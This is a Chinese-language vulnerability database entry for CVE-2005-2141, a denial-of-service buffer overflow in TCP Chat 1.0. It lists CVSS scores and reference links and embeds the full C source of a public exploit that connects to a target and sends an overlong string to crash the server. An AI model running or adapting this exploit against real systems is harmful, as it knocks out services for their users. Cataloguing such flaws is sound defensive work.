CVE-2005-2141
CVSS5.0
发布时间 :2005-07-05 00:00:00
修订时间 :2008-09-05 16:50:59
NMCOE    

[原文]TCP Chat 1.0 allows remote attackers to cause a denial of service (crash) via a long string to the chat service, possibly triggering a buffer overflow.


[CNNVD]TCPChat 拒绝服务漏洞(CNNVD-200507-001)

        TCP Chat是一款小巧到聊天程序。
        TCP Chat 1.0中存在拒绝服务漏洞。
        远程攻击者可通过发送超长的聊天字符串,可能触发缓冲区溢出,导致程序崩溃,产生拒绝服务。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2141
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2141
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-001
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1014371
(VENDOR_ADVISORY)  SECTRACK  1014371
http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=65
(UNKNOWN)  MISC  http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=65
http://addict3d.org/index.php?page=viewarticle&type=security&ID=4377
(UNKNOWN)  MISC  http://addict3d.org/index.php?page=viewarticle&type=security&ID=4377

- 漏洞信息

TCPChat 拒绝服务漏洞
中危 缓冲区溢出
2005-07-05 00:00:00 2005-10-20 00:00:00
远程  
        TCP Chat是一款小巧到聊天程序。
        TCP Chat 1.0中存在拒绝服务漏洞。
        远程攻击者可通过发送超长的聊天字符串,可能触发缓冲区溢出,导致程序崩溃,产生拒绝服务。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序
        注:找不到软件主页

- 漏洞信息 (1090)

TCP Chat (TCPX) 1.0 Denial of Service Exploit (EDBID:1090)
windows dos
2005-07-06 Verified
0 basher13
N/A [点击下载]
/*

TCP Chat(TCPX) DoS Exploit
----------------------------------------

Resolve host... [OK]
[+] Connecting... [OK]
Target locked
Sending bad procedure... [OK]
[+] Server DoS'ed

Tested on Windows2000 SP4
Info: infamous.2hell.com / basher13@linuxmail.org

*/

#include <string.h>
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char doscore[] =
"*** TCP Chat 1.0 DOS Exploit \n"
"***-----------------------------------------------\n"
"*** Infam0us Gr0up - Securiti Research Team \n\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n";


int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

if (argc < 2)
{
printf(" TCP Chat(TCPX) DoS Exploit \n", argv[0]);
printf(" ------------------------------------------\n", argv[0]);
printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [port]\n", argv[0]);
printf("[?]Exam: %s localhost 1234\n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 1234;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}
printf(" TCP Chat(TCPX) DoS Exploit \n", argv[0]);
printf(" ------------------------------------------\r\n\n", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target locked\n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server DoS'ed\n");
closesocket(inetdos);
WSACleanup();
return 0;
}

// milw0rm.com [2005-07-06]
		

- 漏洞信息

17799
TCP Chat (TCPX) Long Text String DoS
Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-07-06 Unknow
2005-07-06 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站